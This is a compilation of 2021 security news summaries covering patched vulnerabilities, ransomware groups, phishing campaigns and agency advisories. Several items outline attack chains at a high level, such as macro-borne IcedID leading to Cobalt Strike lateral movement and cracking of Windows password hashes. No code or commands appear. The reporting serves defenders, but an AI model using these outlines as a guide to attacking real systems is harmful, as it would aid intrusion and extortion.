    Attackers Are Attempting to Exploit Recently Patched Atlassian Confluence CVE-2021-26084 RCE

    “Threat actors were spotted exploiting the CVE-2021-26084 vulnerability in Atlassian’s Confluence enterprise collaboration product a few days after it was patched by the vendor.” Atlassian released security patches to address CVE-2021-26084 last week. The flaw is an OGNL (Object-Graph Navigation Language) injection issue that allows an authenticated user, and in some configurations an unauthenticated one, to execute arbitrary code on Confluence Server and Data Center instances.

    Cisco Fixes a Critical Flaw in Enterprise NFVIS for Which a PoC Exploit Exists

    NFVIS is the software platform that implements full life cycle management from the central orchestrator and controller (APIC-EM and ESA) for virtualized services. NFVIS enables connectivity between virtual services and external interfaces as well as supporting the underlying hardware. NFVIS is often thought of as a virtual software platform and has the following key capabilities; Platform management, A virtualization layer, a Programmable API interface, and a Health monitoring system.

    Sacked Employee Deletes 21GB of Credit Union Files

    A former credit union employee is facing a decade behind bars after pleading guilty to destroying large amounts of corporate data in revenge for being fired. Two days after being fired on May 19 2021, they accessed the file server of the New York-based credit union, opened confidential files and deleted 21.3GB of data, including 20,000 files and almost 3500 directories. The deleted files apparently related to mortgage loan applications and the company’s anti-ransomware software.

    Scam Artists Are Recruiting English Speakers for Business Email Campaigns

    Native English speakers are being recruited in their droves by criminals trying to make Business Email Compromise (BEC) more effective. BEC schemes can be simple to execute and among the most potentially devastating for a business, alongside threats such as ransomware. If a scam is to succeed, the target employee must believe communication comes from a legitimate source -- and secondary language use, spelling mistakes, and grammatical issues could all be indicators that something isn't right.

    FBI, CISA Warn of Potential Cyberattacks Over Labor Day Weekend

    “CISA and the FBI have released an advisory warning of potential cyberattacks that may occur over the coming Labor Day weekend, noting that in recent years hackers have launched dozens of devastating attacks on long weekends” CISA is also urging organizations to take additional steps to secure their systems and reduce their exposure to attacks. Specifically, they recommend proactive threat hunting on their networks to locate potential threat actors.

    Cyberattackers Are Now Quietly Selling Off Their Victim's Internet Bandwidth

    Cybercriminals have been increasingly turning to “proxyware”, an attack where the victim's internet connection is secretly used to generate additional revenue following a malware infection. “Proxyware, also known as internet-sharing applications, are legitimate services that allow users to portion out part of their internet connection for other devices, and may also include firewalls and antivirus programs. Other apps will allow users to 'host' a hotspot internet connection, providing them with cash every time a user connects to it”

    Cyberattacks Use Office 365 to Target Supply Chain

    By crafting believable-looking fake Office 365 alerts, “phishers used fake alerts to trick admins into thinking that their Office 365 licenses had expired” (SecurityIntelligence, 2021). The messages instructed the admins to click a link to sign into the Office 365 Admin Center and review the payment details. Instead, the sign-in page stole their account credentials.

    Ransomware Attack on Swiss City Exposed Citizens' Data

    The leak was claimed by the "Vice Society" ransomware gang, according to researchers. While relatively new to the ransomware scene, Vice Society has adopted the now-common double-extortion technique: once the gang has encrypted files and systems, it exfiltrates sensitive data and threatens to publish it unless the victim pays the ransom, according to researchers. The Vice Society ransomware gang appears to have used similar techniques earlier this month against Indianapolis, Indiana-based Eskenazi Health, which operates a public healthcare system in the U.S.

    Cloudflare Says It Stopped the Largest DDoS Attack Ever Reported

    Cloudflare said its systems stopped the largest reported DDoS attack in July, explaining in a blog post that the attack peaked at 17.2 million requests per second, three times larger than any it had previously recorded. Cloudflare notes that the attack was carried out by a botnet against a customer in the financial industry and hit the Cloudflare edge with over 330 million attack requests within seconds. "The attack traffic originated from more than 20,000 bots in 125 countries around the world. Based on the bots' source IP addresses, almost 15% of the attack originated from Indonesia and another 17% from India and Brazil combined. This indicates that there may be many malware-infected devices in those countries.”

    CISA Urges Enterprises to Fix Microsoft Azure Cosmos DB Flaw

    CISA this week is urging organizations using Microsoft Azure Cosmos DB to act on the recently disclosed ChaosDB vulnerability as soon as possible; the flaw was fixed on the service side, so the customer action is to regenerate the Cosmos DB primary read-write keys that may have been exposed. The news comes after “researchers from Cloud security company Wiz disclosed technical details of a now-fixed Azure Cosmos database vulnerability, dubbed ChaosDB, that could have been potentially exploited by attackers to gain full admin access to other customers’ database instances without any authorization. The flaw was trivial to exploit and impacts thousands of organizations worldwide.”

    Kaseya Issues Patches for Two New 0-Day Flaws Affecting Unitrends Servers

    “U.S. technology firm Kaseya has released security patches to address two zero-day vulnerabilities affecting its Unitrends enterprise backup and continuity solution that could result in privilege escalation and authenticated remote code execution. The two weaknesses are part of a trio of vulnerabilities discovered and reported by researchers at the Dutch Institute for Vulnerability Disclosure (DIVD) on July 3, 2021”

    OpenSSL Vulnerabilities Impact Various Synology Products

    The identified OpenSSL vulnerabilities could lead to remote code execution (RCE) and denial-of-service (DoS) attacks. They are tracked as CVE-2021-3711 and CVE-2021-3712. Devices impacted by these OpenSSL vulnerabilities include:

  • Synology DiskStation Manager (DSM, versions 7.0, 6.2 and UC),
  • SkyNAS, VS960HD,
  • Synology Router Manager (SRM, version 1.2),
  • the VPN Plus Server,
  • and the VPN Server.

    Critical F5 BIG-IP Bug Impacts Customers in Sensitive Sectors

    "BIG-IP application services company F5 has fixed more than a dozen high-severity vulnerabilities in its networking device, one of them being elevated to critical severity under specific conditions. The issues are part of this month's delivery of security updates, which addresses almost 30 vulnerabilities for multiple F5 devices. Of the thirteen high-severity flaws that F5 fixed, one becomes critical in a configuration 'designed to meet the needs of customers in especially sensitive sectors' and could lead to complete system compromise."

    VMware Addressed 4 High-Severity Flaws in vRealize Operations

    VMware fixed four high-severity flaws in vRealize today. "The most severe flaw, tracked as CVE-2021-22025 (CVSS score of 8.6), is a broken access control vulnerability in the vRealize Operations Manager API. An attacker could exploit the vulnerability to gain unauthenticated API access. The vRealize Operations Manager API contains a broken access control vulnerability leading to unauthenticated API access. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.6," reads the advisory published by the virtualization giant. "An unauthenticated malicious actor with network access to the vRealize Operations Manager API can add new nodes to an existing vROps cluster" (Security Affairs, 2021).

    Nearly 73,500 Patients' Data Affected in Ransomware Attack on EYE Clinic in S'pore

    Another ransomware attack has been confirmed, this time by a clinic in Singapore that exposed "personal data and clinical information of nearly 73,500 patients of a private eye clinic" (Straitstimes, 2021), the third such reported incident in a month. The information included names, addresses, identity card numbers, contact details and clinical information such as patients' clinical notes and eye scans, said Eye & Retina Surgeons (ERS) on Wednesday (Aug 25).

    Raccoon Stealer distributed via Twitch and Discord

    Cyjax analysts have detected a new Raccoon Stealer campaign that is leveraging the live-streaming platform Twitch and the online community application Discord. The Raccoon Stealer operators are pushing malicious links, shortened with Bitly, in the chat during live streams. If clicked, the user downloads a ZIP file called "Installer.zip" from the Discord content delivery network (CDN). Inside the ZIP file are over a dozen decoy rich text files (RTFs) and an executable called "Setup.exe".

    FBI PIN: Indicators of Compromise Associated with OnePercent Group Ransomware

    The FBI has learned of a cyber-criminal group who self-identifies as the "OnePercent Group" and who have used Cobalt Strike to perpetuate ransomware attacks against US companies since November 2020. OnePercent Group actors compromise victims through a phishing email in which an attachment is opened by the user. The attachment's macros infect the system with the IcedID banking trojan. IcedID downloads additional software to include Cobalt Strike. Cobalt Strike moves laterally in the network, primarily with PowerShell remoting.

    FBI Flash Alert Warns on OnePercent Group Ransomware Attacks

    "The FBI has learned of a cyber-criminal group who self-identifies as the 'OnePercent Group' and who have used Cobalt Strike to perpetuate ransomware attacks against US companies since November 2020. OnePercent Group actors compromise victims through a phishing email in which an attachment is opened by the user. The attachment's macros infect the system with the IcedID banking trojan. IcedID downloads additional software to include Cobalt Strike. Cobalt Strike moves laterally in the network, primarily with PowerShell remoting. OnePercent Group actors encrypt the data and exfiltrate it from the victims' systems. The actors contact the victims via telephone and email, threatening to release the stolen data through The Onion Router (TOR) network and clearnet, unless a ransom is paid in virtual currency. OnePercent Group actors' extortion tactics always begin with a warning and progress from a partial leak of data to a full leak of all the victim's exfiltrated data."

    637 Flaws in Industrial Control System (ICS) Products Were Published in H1 2021

    “Industrial cybersecurity firm Claroty published its third Biannual ICS Risk & Vulnerability Report that analyzes the vulnerability landscape relevant to leading automation products used across the ICS domain. The company reported that during the first half of 2021, 637 vulnerabilities affecting industrial control system (ICS) products were published, affecting products from 76 vendors,

    CISA Shares Guidance on How to Prevent Ransomware Data Breaches

    CISA's fact sheet includes best practices for preventing ransomware attacks and protecting sensitive information from exfiltration attempts. The federal agency issued these recommendations in response to most ransomware gangs using data stolen from their victims' networks as leverage in ransom negotiations under the threat of publishing the stolen info on dedicated leak sites.

    Razer Bug Lets You Become a Windows 10 Admin by Plugging in a Mouse

    A Razer Synapse zero-day vulnerability has been disclosed on Twitter, allowing anyone to gain Windows admin privileges simply by plugging in a Razer mouse or keyboard. Razer is a very popular computer peripherals manufacturer known for its gaming mice and keyboards. When a Razer device is plugged into Windows 10 or Windows 11, the operating system will automatically download and begin installing the Razer Synapse software on the computer. Razer Synapse is software that allows users to configure their hardware devices, set up macros, or map buttons,

    Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities

    Malicious cyber actors are actively exploiting the following ProxyShell vulnerabilities: CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207. An attacker exploiting these vulnerabilities could execute arbitrary code on a vulnerable machine. CISA strongly urges organizations to identify vulnerable systems on their networks and immediately apply Microsoft's Security Update from May 2021—which remediates all three ProxyShell vulnerabilities—to protect against these attacks.

    Cisco Warns of Server Name Identification Data Exfiltration Flaw in Multiple Products

    Cisco is warning their customers of a vulnerability in Server Name Identification (SNI) request filtering for multiple products (Cisco Web Security Appliance (WSA), Cisco Firepower Threat Defense (FTD), and the Snort detection engine). Cisco is investigating the issue to determine affected products; Cisco stated that the following products are under active investigation to decide whether or not they are impacted:

    Rival Newcomer Hive's Ransomware-as-a-Service Operation Continues to Swarm Victims

    The operators behind LockBit have released a newer version of their crypto-locking malware that contains new capabilities, some of which they have borrowed from other cyber-criminal groups. The newcomer referred to as "Hive" by security researchers has launched a data-leak site (titled HiveLeaks) where it claims to have successfully breached various organizations.

    Cars and Hospital Equipment Running Blackberry QNX May Be Affected by Badalloc Vulnerability

    "The FDA, in its warning that specific medical devices may be affected by BlackBerry QNX cybersecurity vulnerabilities, points to the CISA alert. CISA mentions CVE-2021-22156, which describes an integer overflow vulnerability in the calloc() function of the C runtime library of affected versions of BlackBerry® QNX Software Development Platform (SDP) version(s) 6.5.0SP1 and earlier, QNX OS for Medical 1.1 and earlier, and QNX OS for Safety 1.0.1 and earlier that could allow an attacker to potentially perform a denial of service or execute arbitrary code."

    Cisco Won't Fix Zero-Day RCE Vulnerability in End-Of-Life VPN Routers

    In a security advisory published on Wednesday, Cisco said that a critical vulnerability in Universal Plug-and-Play (UPnP) service of multiple small business VPN routers would not be patched because the devices have reached end-of-life. The zero-day bug (tracked as CVE-2021-34730 and rated with a 9.8/10 severity score) is caused by improper validation of incoming UPnP traffic and was reported by Quentin Kaiser of IoT Inspector Research Lab. Unauthenticated attackers can exploit it to restart vulnerable devices or execute arbitrary code remotely as the root user on the underlying operating system,

    The PrintNightmare Continues: Another Zero-Day in Print Spooler Awaits Patch

    The nightmare fiasco is still ongoing; some companies have realized that the safest solution at this point is to disable the printer service altogether and to also prevent users from installing drivers via Microsoft's native Point and Print function. "Since June, Microsoft has announced seven vulnerabilities in Print Spooler as researchers have continued to analyze the service and reverse engineer the patches, finding more flaws. To date, none of the solutions from Microsoft have fully addressed the issues in the Print Spooler service,

    Top 7 AWS Security Vulnerabilities Based on Real-World Tests

    Cloud security risks, in this case referencing AWS specifically, include a lack of security controls, vulnerabilities that could allow privilege escalation, and misconfigurations that could leave data accessible to prying eyes. These security implications are no different from those for on-premises environments. Proprietary solutions like AWS require the same fine tuning and due diligence as the operating systems, services, and software kept in IT closets on-site.

    Supply Chain Attacks Are Closing in on MSPs

    "Perhaps the most far-reaching supply chain attack conducted by a non-state actor in the history of the tactic took place this July. This time, Kaseya, one of the world's largest IT management platforms, was compromised by the Russia-based hacking group REvil. Unlike in the SolarWinds and Codecov incidents, this attack included a ransomware stage meant to deliver financial rather than intelligence returns for the attackers." REvil targeted Kaseya's remote monitoring and management (RMM) solution, known as Kaseya VSA, which is used to manage client machines from afar. Again, targeting was indiscriminate, but unlike espionage actors, the ransomware gang could focus on maximizing the financial returns of the attack rather than trying to avoid detection.

    PrintNightmare Update

    Back in June, Microsoft patched a vulnerability affecting the Microsoft Windows Print Server that was tracked as CVE-2021-1675. Initially, it was described as an elevation of privilege (EoP) vulnerability; EoP vulnerabilities can result in an attacker bypassing access restrictions on a machine or system. Access restrictions typically include ones that are enforced through domain-based group policies or local ones. The simplest set of access restrictions applied on machines typically relies on preset groups:

    • Administrator
    • Power User
    • Standard

    These are predefined ACLs in Microsoft operating systems ranging from XP to current versions. Of course, restrictions can be more granular and refined than what Microsoft provides out of the box. What makes this vulnerability so dangerous is that any restrictions placed on a user's machine can be bypassed. An attacker could essentially do whatever they want to a targeted machine: they could install malware, ransomware or remote access tools to access devices without the user's knowledge.

    Case Files Affected in Dallas Police Department Data Loss

    An employee working for the department attempted to move data from one location to another. Reporting suggests the migration was intended to centralize data access on a single server. In a disclosure notice released last Wednesday, defense attorneys were told that 22TB of data, approximately 22,528GB, had disappeared and possibly been deleted. After data recovery efforts, IT teams restored approximately 14TB, with around 8TB missing and unrecoverable.

    America's Secret Terrorist Watchlist Exposed on the Web Without a Password

    Comparitech, a company that we mentioned in a previous report, has discovered another cloud misconfiguration resulting in data leakage. A list containing Terrorist Screening records was found on July 19th, when the Censys and ZoomEye search engines indexed an exposed Elasticsearch server. The list was left online without a password or any other authentication to secure it. It contained 1.9 million records, including full name, TSC watchlist ID, citizenship, gender, date of birth, passport number, and more,

    Blackberry QNX RTOS Vulnerabilities - BadAlloc

    CISA released an Alert today on devices incorporating older versions of multiple BlackBerry QNX products affected by a BadAlloc vulnerability. A malicious actor could exploit this vulnerability to take control of an affected system or cause a denial-of-service condition.

    SIM Swap Scammer Pleads Guilty to Instagram Account Hijacks, Crypto Theft

    Declan Harrington, a Massachusetts man charged two years ago over his alleged involvement in a series of SIM swapping attacks, has admitted to stealing cryptocurrency from multiple victims and hijacking the Instagram accounts of others. "Harrington was charged with Eric Meiggs in November 2019 for targeting the owners of high-value ('O.G.' or 'Original Gangster') Instagram and Tumblr accounts,

    Critical Remote Code Execution Vulnerability in Palo Alto Networks Cortex XSOAR

    Cortex XSOAR is a "detection and response platform used to unify case management, automation, real-time collaboration and threat intel management to serve security teams across incident lifecycles." Researchers discovered a vulnerability in the platform that could allow unauthenticated threat actors to execute arbitrary code over the Internet on fully integrated endpoints. The flaw exists due to insufficient validation of user input in .NET Core, which would allow remote threat actors to pass specially crafted entries into the vulnerable application(s).

    FINRA Alerts Firms to a Phishing Email Campaign Using Multiple Imposter FINRA Domain Names

    FINRA is a government-authorized not-for-profit organization that oversees U.S. broker-dealers. In ongoing phishing attacks, hackers are targeting U.S. brokerage firms and brokers by impersonating FINRA officials and threatening penalties against them. The organization is primarily responsible for investigating potential securities violations and, when appropriate, bringing formal disciplinary actions against firms and their associated persons.

    CVE-2021-20090 Actively Exploited to Target Millions of IoT Devices Worldwide

    According to Tenable researchers, "Threat actors actively exploit a critical authentication bypass vulnerability, tracked as CVE-2021-20090, impacting home routers with Arcadyan firmware to deploy a Mirai bot. A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication" (Security Affairs, 2021).

    Australian Govt Warns of Escalating LockBit Ransomware Attacks

    "The Australian Cyber Security Centre (ACSC) warns of an increase in LockBit 2.0 ransomware attacks against Australian organizations starting July 2021" (Bleeping Computer, 2021). The organization has seen a heavy increase in LockBit 2.0 activity in Australia. In their alert, they warn that victims of the ransomware have also seen their data stolen and leaked online, a double-extortion technique also used by other ransomware operators. Attacks have risen sharply since July and continue to do so.

    Synology Warns of Malware Infecting NAS Devices with Ransomware

    Synology, a NAS storage device maker from Taiwan, warned this week that the StealthWorker botnet has been targeting its devices through ongoing brute-force attacks that may lead to ransomware infection. The botnet uses already infected devices to try to guess common admin credentials on NAS devices. If the botnet guesses a password correctly, it will attempt to download malware, including ransomware. Compromised devices may then be used to carry out additional attacks against other Linux-based devices.

    Vishing Through Phishing Attacks

    As the title states, these phishing attacks are a little bit different. The phishing attacks that we've reported, usually on a weekly basis, contain malicious attachments in the form of Excel files, PDFs, or executables, to name a few. They typically contain malware or beacons so that threat actors can remotely access infected machines and control them. Depending on what type of access restrictions are applied on the targeted device during initial infection, they can either prevent an attacker from installing additional components or allow them to carry out further malicious activity and exfiltrate sensitive information. Even if a user account has access restrictions in place, an attacker could still leverage one of the several recently disclosed vulnerabilities to elevate privileges (if unpatched).

    Angry Conti Ransomware Affiliate Leaks Gang's Attack Playbook

    Ever hear the story of the disgruntled network administrator? One who leaves a company upset, who once had (or still has) the keys to the kingdom: domain administrative credentials, the external IP addresses of VPN appliances and firewalls, and probably more knowledge of the network than anyone else within the organization? After leaving a company, it's likely that at some point they have come back, using the information acquired while employed or by installing backdoor software on servers or workstations before departure.

    Admin's Nightmare: Combining HiveNightmare/SeriousSAM and AD CS Attack Paths for Profit

    Black Hills produced a report outlining an attack scenario that requires user interaction to work: "an adversary would need to entice a remote user or system to authenticate back to the adversary-controlled host to relay the credential to the certificate server." If you recall, the Hive/SAM vulnerabilities could result in an attacker obtaining administrative rights on a machine by obtaining password hashes stored using a weak algorithm (unsalted MD4). After obtaining the hashes from the Windows databases, an attacker using tools like Mimikatz and John the Ripper can easily crack the hashes, revealing passwords.

    New DNS Vulnerability Allows 'Nation-state Level Spying' on Companies

    Security researchers released details this week of a new type of DNS vulnerability which could allow attackers to target sensitive information on corporate networks. The vulnerabilities impact major DNS-as-a-Service (DNSaaS) providers who lease their services to organizations that do not want to manage and secure their DNS records on their own. "As revealed at the Black Hat security conference by cloud security firm Wiz researchers Shir Tamari and Ami Luttwak, these DNS flaws provide threat actors with nation-state intelligence harvesting capabilities with a simple domain registration."

    Google Chrome Stable Channel Update for Desktop to Patch Vulnerabilities Potentially Allowing System

    Google Chrome has had a tough year so far! Several vulnerabilities have been identified and disclosed, resulting in IT teams and staff updating their browsers quite frequently. In April, Google had to quickly patch multiple zero-days (previously unknown flaws) in Chrome's V8 JavaScript engine. The company openly admitted that the high-severity bug was being exploited in the wild. In an advisory released by Google today, they're urging everyone to update to version 92.0.4515.107 as soon as possible. Several High to Medium severity vulnerabilities were discovered, yet technical details have been withheld to prevent exploitation:

    7 Federal Agencies Still Lack Basic Cybersecurity

    A 47-page report titled "Federal CyberSecurity: America's Data at Risk," by the staff of the Senate Committee on Homeland Security and Governmental Affairs, released Tuesday (August 3rd), states that the "Inspectors general identified many of the same issues that have plagued federal agencies for more than a decade" (BankInfoSecurity, 2021). State, Housing and Urban Development, Agriculture, Health and Human Services and Education - and the Social Security Administration - are still failing to meet even basic cybersecurity standards,

    Multiple Vulnerabilities in Cisco Products

    Cisco has released multiple security updates to address several security vulnerabilities impacting Cisco Small Business products.

    CVE-2021-1574 and CVE-2021-1576 affect the following Cisco Small Business Routers if they are running a firmware release earlier than Release 1.0.03.22:

    • RV340 Dual WAN Gigabit VPN Router
    • RV340W Dual WAN Gigabit Wireless-AC VPN Router
    • RV345 Dual WAN Gigabit VPN Router
    • RV345P Dual WAN Gigabit POE VPN Router

    CVE-2021-1602 affects the following Cisco Small Business RV Series Routers if they are running firmware releases earlier than 1.0.01.04:

    • RV160 VPN Routers
    • RV160W Wireless-AC VPN Routers
    • RV260 VPN Routers
    • RV260P VPN Router with PoE
    • RV260W Wireless-AC VPN Routers

    CVE-2021-1572 affects the following Cisco products and releases:

    • Cisco Network Services Orchestrator CLI Secure Shell Server: Releases 5.4 through 5.4.3.1 and Releases 5.5 through 5.5.2.2
    • ConfD CLI Secure Shell Server: Releases 7.4 through 7.4.3 and Releases 7.5 through 7.5.2

    COVID-19 Vaccine Portal for Italy's Lazio Region Hit With Cyber Attacks

    The attackers were able to access the organization's systems with administrator privileges, where they then installed "crypto-locker" malware that encrypted the data on the system. As a result of the attacks, systems were taken offline, preventing the organization from accessing resources used in COVID-19 vaccine distribution in Lazio, Italy. A "'powerful' attack had hit the region's databases on Sunday and all systems are disabled, including the Salute Lazio portal and the system that managed the COVID-19 vaccine bookings,

    RDP Brute Force Attacks Explained

    Remote Desktop Protocol continues to be leveraged in attacks. Honeypot activity observed by various companies and researchers shows that hackers are constantly attempting to brute-force their way into networks by guessing username and password combinations on RDP ports exposed to the Internet. "While you read these words, the chances are that somebody, somewhere, is trying to break in to your computer by guessing your password. If your computer is connected to the Internet, it can be found quickly, and if it can be found, somebody will try to break in,

    Experts Found Potential Remote Code Execution in PyPI

    Security researchers this week disclosed several flaws in PyPI. "Python Package Index (PyPI) is the official third-party software repository for Python. PyPI as an index allows users to search for packages by keywords or by filters against their metadata, such as free software licenses or compatibility with POSIX" (Security Affairs, 2021). The most severe flaw could potentially lead to the compromise of the entire PyPI infrastructure. The flaw affects the combine-prs.yml workflow in pypa/warehouse, which includes the current source code of PyPI.

    Microsoft Warns of Dangerous Phishing Email

    Microsoft warned this week of a phishing email using spoofed sender addresses. Microsoft put out an alert after observing an active campaign targeting Office 365 organizations with convincing emails and several techniques to bypass phishing detection, including an Office 365 phishing page, Google cloud web app hosting, and a compromised SharePoint site that urges victims to type in their credentials. "An active phishing campaign is using a crafty combination of legitimate-looking original sender email addresses, spoofed display sender addresses that contain the target usernames and domains, and display names that mimic legitimate services to try and slip through email filters," the Microsoft Security Intelligence team said in an update.

    Remote Print Server Gives Anyone Windows Admin Privileges on a PC

    Using a remote print server, a researcher was able to gain complete control over a device by installing a print driver. "In June, a security researcher accidentally revealed a zero-day Windows print spooler vulnerability known as PrintNightmare (CVE-2021-34527) that allowed remote code execution and elevation of privileges. While Microsoft released a security update to fix the vulnerability, researchers quickly figured out ways to bypass the patch under certain conditions. Since then, researchers have continued to devise new ways to exploit the vulnerability, with one researcher creating an Internet-accessible print server allowing anyone to open a command prompt with administrative privileges."

    DarkSide Ransomware Gang Returns as New BlackMatter Operation

    According to reports this week, the DarkSide ransomware gang may have rebranded as a new ransomware operation called BlackMatter, which has been seen in ongoing attacks against corporate entities. Back in May of this year, DarkSide operators suddenly lost access to their servers, and their cryptocurrency wallets were seized by an unknown third party. It was later revealed that the FBI had recovered 63.7 Bitcoins from the Colonial Pipeline attacks.

    BleepingComputer was made aware of multiple victims targeted by the BlackMatter ransomware group. So far, ransom demands have ranged from $3-4 million. "While researching the new ransomware group, BleepingComputer found a decryptor from a BlackMatter victim and shared it with Emsisoft CTO and ransomware expert Fabian Wosar. After analyzing the decryptor, Wosar confirmed that the new BlackMatter group is using the same unique encryption methods that DarkSide had used in their attacks."

    NSA Shares Guidance on How to Secure Your Wireless Devices/Guidance on MiTM Attack

    Staff continue to work remotely, and companies have realized that employees are just as efficient, if not more so, while traveling and working from their home office or sofa. There are cybersecurity risks associated with teleworking, and we've explained and mentioned some of them quite frequently in our daily reporting and during our calls.

    Wireless security is often overlooked, and public networks should be considered a 10/10 if they could be rated on the CVSS scale in terms of severity. As staff travel and continue to work remotely, it's apparent that they will need internet access to reach corporate information and resources. The WFH transition has placed some of the cybersecurity burden directly on employees, as the confines of enterprise security products no longer protect them.

    McAfee: Babuk Ransomware Decryptor Causes Encryption 'Beyond Repair'

    Attackers are targeting Linux, ESXi (VMware), as well as Unix variants. As outlined in a McAfee Advanced Threat Research report, the Babuk ransomware gang is exploiting CVE-2021-27065 in Microsoft Exchange Servers. After initial access, the actors place a Cobalt Strike backdoor on the system to maintain persistence, so they can come and go as they please. "Using a custom version of zer0dump, the attacker gained domain administrator credentials and used Mimikatz to get access to credentials. They are then using standard protocols like SSH/SCP to move files to and from systems" (McAfee, 2021).

    PunkSpider Tool at DEF CON Stirs Debate

    PunkSpider is a tool that pretty much anyone could use to identify weaknesses in websites. It can scan the internet, identifying sites that may have backend vulnerabilities. Depending on what type of vulnerabilities are discovered, an attacker could then exploit them. "The new and improved version is a 'completely re-engineered' system that also expands the capabilities of the tool to find vulnerabilities,

    Ransomware Families: 2021 Data to Supplement the Unit 42 Ransomware Threat Report

    In a recent report from Palo Alto Networks, researchers reiterate the importance of identifying and preventing phishing messages targeting companies, as phishing remains the most effective way for criminals to deliver malware, especially ransomware. Broken down by protocol, SMTP accounted for most attacks, with IMAP following close behind as the second delivery protocol. Palo Alto notes that an astounding 80.8% of the ransomware observed in attacks was delivered as PE (Portable Executable) files.

    LockBit Ransomware Now Encrypts Windows Domains Using Group Policies

    A new version of the LockBit 2.0 ransomware has been found that automates the encryption of a Windows domain using Active Directory group policies. The LockBit ransomware operation launched in September 2019 as a ransomware-as-a-service, where it can be purchased and used to attack companies. Affiliates earn 70-80% of a ransom payment, and the LockBit developers keep the rest.

    Is REvil Ransomware Operation Returning as 'BlackMatter'?

    REvil, the group responsible for the recent supply-chain attacks targeting MSPs and their customers, recently went offline. At this time, it is unknown whether law enforcement or government agencies intervened in a coordinated effort to take them offline, or whether they decided to close shop of their own free will. Previously, takedowns, raids, and seizures of 'underground' cybercriminal operations have been reported to be carried out by joint efforts of various agencies, both government and private.

    Apple Patches Zero-Day Flaw That Hackers May Have Exploited

    The company released several updates for its various operating systems:

    • iPad (iOS)
    • Macintosh computers (MacOSX)
    • Mobile (iOS)

    The list of impacted devices includes Macs, iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation). The vulnerability impacting the operating systems is tracked as CVE-2021-30807 and described as a memory corruption issue in the IOMobileFramebuffer kernel extension, which an anonymous researcher reported.

    Microsoft Releases Guidance for Mitigating PetitPotam NTLM Relay Attacks

    "Windows Challenge/Response (NTLM) is the authentication protocol used on networks that include systems running the Windows operating system and on stand-alone systems" (Microsoft, 2018). "NTLM credentials are based on data obtained during the interactive logon process and consist of a domain name, a user name, and a one-way hash of the user's password. NTLM uses an encrypted challenge/response protocol to authenticate a user without sending the user's password over the wire. Instead, the system requesting authentication must perform a calculation that proves it has access to the secured NTLM credentials" (Microsoft, 2018).

    Popular Wi-Fi Routers Still Using Default Passwords Making Them Susceptible to Attacks

    A recent study suggests that 1 in 16 home routers are configured with a default admin username/password combination, typically admin/admin or admin/password, which are easily guessable. By scanning the internet, researchers uncovered that, "out of the total of 9,927 routers that they tested, they found that 635 were susceptible to default password attacks" (Comparitech, 2021).

    Microsoft Warns Over This Unusual Malware That Targets Windows and Linux

    Both operating systems are being infected with the LemonDuck crypto-mining malware, which is distributed via traditional phishing tactics, removable media (flash drives), brute force attacks and internet-facing vulnerabilities (Exchange Server). "[LemonDuck] continues to use older vulnerabilities, which benefit the attackers at times when focus shifts to patching a popular vulnerability rather than investigating compromise" (Microsoft, 2021).

    Researchers Find New Attack Vector Against Kubernetes Clusters via Misconfigured Argo Workflows Instances

    Researchers at Intezer have detected a new attack vector against Kubernetes (K8s) clusters via misconfigured Argo Workflows instances. The company reported that they've observed attackers dropping cryptominers using this method in the wild. They've detected hundreds of misconfigured environments that belong to companies from various sectors, including technology, finance, and logistics.

    Cybercriminals Rewrite Malware to Target MacOS

    Cybercriminals have repurposed a piece of Windows malware to target macOS devices. The malware, called XLoader, is based on FormBook, a common malware strain over the past five years. This new variant is widespread and inexpensive. FormBook was so common that research shows it has impacted 4% of organizations worldwide. The original FormBook was offered for just $29 per week and was designed “as an information stealer to steal credentials from different Web browsers, collect screenshots, monitor and log keystrokes, and download and execute files according to instructions from an attacker's command-and-control server” (Dark Reading, 2021).

    Exploitation of Pulse Connect Secure Vulnerabilities

    Since March 31, 2021, CISA and Ivanti have assisted multiple entities whose vulnerable Pulse Connect Secure products have been exploited by a cyber threat actor. To gain initial access, the threat actor is leveraging multiple vulnerabilities, including CVE-2019-11510, CVE-2020-8260, CVE-2020-8243, and the newly disclosed CVE-2021-22893. The threat actor is using this access to place webshells on the Pulse Connect Secure appliance for further access and persistence. The known webshells allow for a variety of functions, including authentication bypass, multi-factor authentication bypass, password logging, and persistence through patching.

    New Linux Kernel Bug Lets You Get Root on Most Modern Distros

    Researchers at Qualys discovered another vulnerability that could allow an unprivileged local attacker to gain root privileges by exploiting a local privilege escalation flaw in default configurations of the Linux kernel's filesystem layer on vulnerable devices. Qualys researchers have named the flaw Sequoia; it impacts all Linux kernel versions released since approximately 2014.

    A Bug in Fortinet Fortimanager and Fortianalyzer Allows Unauthenticated Hackers to Run Code as Root

    Fortinet has released patches for its FortiManager and FortiAnalyzer network management solutions. The vulnerabilities could have allowed an attacker to execute code on targeted devices with root privileges. The bug was disclosed by Cyrille Chatras of the Orange Group. The company has since released a workaround and patches to correct the software deficiencies.

    China Says Microsoft Hacking Accusations Fabricated by US and Allies

    Several publications were shared and released yesterday regarding malicious activity determined to originate from China in nation-state attacks against the United States. APT40, also known as Bronze Mohawk, FeverDream, G0065, Gadolinium, GreenCrash, Hellsing, Kryptonite Panda, Leviathan, MudCarp, Periscope, Temp.Periscope, and Temp.Jumper, has been determined to be located in Haikou, Hainan Province (People’s Republic of China, PRC) and has been active since approximately 2019.

    HP Patches Vulnerable Driver Lurking in Printers for 16 Years

    HP this week patched a severe vulnerability tracked as CVE-2021-3438. The vulnerability received a CVSS score of 8.8 and has resided in a printer driver for the past 16 years. The security issue is described as a "potential buffer overflow in the software drivers for certain HP LaserJet products and Samsung product printers [that] could lead to an escalation of privilege" (ZDNet, 2021). HP, Xerox, and Samsung printer models have likely contained the vulnerable driver software since 2005.

    Ransomware Hits Law Firm Counseling Fortune 500, Global 500 Companies

    On February 27th, 2021 the company became aware of a breach impacting their systems. The attackers were able to access, "certain individuals' names, dates of birth, driver's license numbers / state identification numbers, financial account information, Social Security numbers, passport numbers, payment card information, medical information, health insurance information, biometric data, and/or online account credentials (i.e. usernames and passwords),

    New Windows Print Spooler Zero Day Exploitable via Remote Print Servers

